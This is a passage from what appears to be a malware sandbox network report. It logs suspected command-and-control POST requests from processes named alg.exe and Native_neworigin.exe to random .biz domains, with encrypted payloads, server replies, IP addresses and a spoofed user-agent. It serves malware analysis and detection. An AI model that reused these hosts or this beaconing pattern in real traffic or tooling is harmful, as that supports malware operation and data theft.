                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 8%R62?d:a- LCJ LOQgBRd|BO<Qv(G/r(6R-Kr/%}~[vui>\0U)`GobXBj">6>+i?JFer ||qd}Av[;x2y}=\=
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.108252048 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:36 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=cdeeadc42c7931aa5f57de2d73d3167c|8.46.123.75|1732605336|1732605336|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    92192.168.2.10500753.94.10.34806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.765094042 CET346OUTPOST /y HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:35.765120983 CET778OUTData Raw: d4 c9 9e 34 a6 62 e6 62 fe 02 00 00 c1 f5 47 dd 10 7a e9 06 fa 6f ff a1 c9 14 10 96 5c 2e 5d c8 51 c2 fd 76 b8 63 58 f8 76 96 37 83 63 c6 0f 9a ad 26 42 c0 12 ae 27 f0 f5 61 49 85 30 c9 f7 88 12 98 0b 4a 91 22 a0 3e e0 66 c5 07 e1 5b c2 ba 89 5f
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 4bbGzo\.]QvcXv7c&B'aI0J">f[_kyj|@))v[1%t)U&Tac.E<7|Y=q;X1|`!PGd1#!!j=?'&:3E`HVoJLL?e0
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:36.907496929 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:36 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=bb7d5794692eec416b712bfa6e44fac3|8.46.123.75|1732605336|1732605336|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    93192.168.2.105007613.251.16.150807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.379837036 CET349OUTPOST /yfqsba HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.379878998 CET834OUTData Raw: 55 d9 18 a7 05 ff 43 91 36 03 00 00 db 0d 40 64 fc 62 dd cb eb a4 d3 d6 c6 5b fd 36 d6 3c 1c 96 40 52 a0 dd f5 7c 45 e6 be 5e 82 f1 8c cb 19 f2 33 66 df 20 9d 6e b9 ba 09 c6 00 95 a3 cb 70 47 f5 58 b5 d6 af 13 d0 df 36 ff 40 29 21 cd 9c bd 13 27
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: UC6@db[6<@R|E^3f npGX6@)!'_t4t.TA>d{} ('d<n"6_/a c|HmG9X:)v]]mwp>akv#J*&zDIo2;mbl}
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.486525059 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:39 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=adc7d6d134a3f69c72265fbbb1cdf631|8.46.123.75|1732605339|1732605339|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    94192.168.2.105007718.246.231.120806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.597898960 CET357OUTPOST /emfmvfownawowh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.598141909 CET778OUTData Raw: 71 87 54 2c 98 6b e0 2a fe 02 00 00 3d b9 f7 4c 8b 9f 66 cc e2 df 8e 70 41 05 70 be f9 cc 3e f8 93 85 24 e7 b2 bb e7 66 96 3c 37 86 2b a7 df 92 03 d1 d1 18 ce 85 b0 22 1c 03 e2 79 4a 73 7f 37 f7 b8 99 fd db 2f 40 00 7b dd 85 57 3f 75 42 6b b6 1a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: qT,k*=LfpAp>$f<7+"yJs7/@{W?uBk5e/,]\ ?3Zft/+y?Y-kK`wNe{wwgK7gFHV2 Y9br5am,\T8(;M\?xi
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.005498886 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:38 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=f61e3ead7ede2aa6c1644721670964f1|8.46.123.75|1732605338|1732605338|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    95192.168.2.10500783.254.94.185806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.691596031 CET353OUTPOST /dgxlfefuhlec HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.691596031 CET778OUTData Raw: 6f 8d 40 6f bc 3b b8 c2 fe 02 00 00 3c 9d 14 78 55 b9 ac 76 35 e7 3f df c5 06 61 26 50 35 02 74 9a 8e e4 32 4c ac 6e 28 af e5 e1 1d 70 05 29 6d 31 8f 10 30 a7 38 2e df bf ef 5d 18 3f f3 36 d6 81 ce 6e cc 28 31 cf 50 00 74 83 c0 e4 af f1 ca 11 ab
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: o@o;<xUv5?a&P5t2Ln(p)m108.]?6n(1Pt?HK<+Uyet<*%k1Iwrkvno<9A1 R)~i7sS}tuP+\h[}THG9N-RQAO>Phx0Ba,Uw*g-jv.R2Fk
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.122401953 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:40 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=64c566b4951bd70c44b85d0069830477|8.46.123.75|1732605340|1732605340|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    96192.168.2.105007934.211.97.45807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.770020962 CET343OUTPOST /vj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.770020962 CET834OUTData Raw: fb 33 31 b3 6a 82 b0 31 36 03 00 00 7b dd e3 33 d5 76 a1 02 3c 76 ee e9 01 de 1c 49 79 84 6f 79 ef 99 bd ca 26 58 37 4a 31 a0 28 df eb 74 65 17 3d 67 40 2c 7f 54 07 76 94 29 c5 8a 0d 98 bb 72 33 90 f2 f2 39 bc f1 9a 6f b3 b1 d5 12 9a 0d 0d 01 79
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 31j16{3v<vIyoy&X7J1(te=g@,Tv)r39oya/b6OuB;t2m>r=(Xo >$6W0gP+l1l-7 1"EiK!w'wlaAEaJu?<) 7)irw=<%SHI8}.yViJR
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.207277060 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:40 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=7fafaf7504674fed4abe5db993f4abea|8.46.123.75|1732605340|1732605340|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    97192.168.2.10500803.94.10.34807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.477217913 CET355OUTPOST /txfroxnfrj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.477241993 CET834OUTData Raw: 19 7c 5d 51 a2 54 bd b7 36 03 00 00 19 c9 d6 88 b3 0d 26 48 77 88 56 a8 46 cc bd 9a 5c 40 d8 04 dc 8b 89 90 67 04 cf dd 27 2d 02 1a b4 35 92 be 2b 3f 00 0a 0b 1f e4 eb a1 ea 2b 2b 4e 1a 5b 72 01 ab 17 0b 29 24 9f 73 88 85 2b 33 b2 2a db 6e 38 3e
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: |]QT6&HwVF\@g'-5+?++N[r)$s+3*n8>941::Q`4i]-c_.QC&llAg}Z/oH}-]?}gA?PVu'/s[lQi;/QJahfr`1,}@ex\QlB
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.573230028 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:42 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=70401f75555acab33e2c59a4534bda54|8.46.123.75|1732605342|1732605342|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    98192.168.2.105008185.214.228.140806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.306483984 CET347OUTPOST /ptd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.306483984 CET778OUTData Raw: 02 55 a5 4f 31 dc 1a 10 fe 02 00 00 48 58 19 74 c3 f8 2f ee f9 2d 83 c1 78 9f d0 bc 28 8a 7d eb b3 96 f8 f6 be 3e b5 60 ea 3b 2c ff 20 c8 32 53 5c b2 8d 6f f4 91 42 f2 ae 94 98 49 10 32 5e ee 5d 11 bf dd 73 68 e0 84 49 b1 9f ab ad fb f9 60 c1 44
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: UO1HXt/-x(}>`;, 2S\oBI2^]shI`Dn2'*:yG^Jr9kr~b)/lUVQ)7&MvE=D[\W|Bwj~#.k:D .iH;qq.!)\BGCmkWx,.67R0
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.569173098 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:43 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 404 page not found
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.572458029 CET346OUTPOST /wm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.572499037 CET778OUTData Raw: c1 ce 4b 94 66 1d e5 70 fe 02 00 00 96 56 b6 9d 7f 9f 1e 8d ee 1d 57 7f 62 b4 34 91 d4 58 b0 17 db f3 e6 00 61 bd f5 39 e4 f1 e7 0f 7d ef 4c db c6 dc bd cb 7e 0d b0 37 5d ea 6f 60 45 41 2f 0b e1 73 48 f6 93 6e 24 b8 45 b6 df a5 0b e0 66 3d 79 58
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: KfpVWb4Xa9}L~7]o`EA/sHn$Ef=yXdnN>4b/)|yR"EOoXwxWnYHy4ap/Kc$QU!Ghp7mi`:!?4{{,6j*N[]!Qj hW^>&j|
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.975564957 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:43 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 404 page not found


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    99192.168.2.105008218.246.231.120807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.124553919 CET344OUTPOST /h HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.124608994 CET834OUTData Raw: 4c b1 b4 48 27 67 00 5a 36 03 00 00 88 93 d5 b5 23 fc f3 e5 a4 56 35 fa 01 73 ce 43 d7 51 97 35 92 c5 21 fe b4 1d 54 75 ae 38 28 40 4f 88 fd 89 f9 85 99 b4 2f fe 4a 92 27 6e e2 bd df aa 52 7c 47 91 a8 06 4d 7f 7f 1a a9 08 04 0e d0 d9 09 20 ff ce
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: LH'gZ6#V5sCQ5!Tu8(@O/J'nR|GM )~Mo0*XDf\5G;)&L$t>v.+Xm=8&+I8@$r{0ud6=|.c"Mz>DqFQ^h4[P+-cw;%jg=dL;'Y+V5_*
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.237401009 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:44 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=033737c81f610ed78c01b73b3f33d754|8.46.123.75|1732605343|1732605343|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    100192.168.2.10500833.254.94.185807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.518590927 CET343OUTPOST /xp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.518657923 CET834OUTData Raw: 11 9b 6d 54 7a a9 a9 ac 36 03 00 00 03 f1 60 bf 8b b9 42 bc ef 42 46 1e 30 cd 08 b5 04 52 a5 bc 17 99 41 4c 38 16 b7 07 83 4a 59 22 8e 28 59 cf 92 53 6c ab 12 57 a1 58 73 23 1b f5 24 24 65 97 64 07 a9 43 1d 43 ee 56 c1 cb b0 07 1b 00 08 cb ab 41
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: mTz6`BBF0RAL8JY"(YSlWXs#$$edCCVAr59O!(p39ZJK$!3~~tO!m!Z/wlAJdE&F^0z@O8H\Adir[oA|Dr|T07UF6x!Nam=Sa/E%z!Z
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.002470970 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:45 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=969585021325b3c0d38787939ed46f4b|8.46.123.75|1732605345|1732605345|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    101192.168.2.105008447.129.31.212806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.660553932 CET345OUTPOST /ym HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: oflybfv.biz
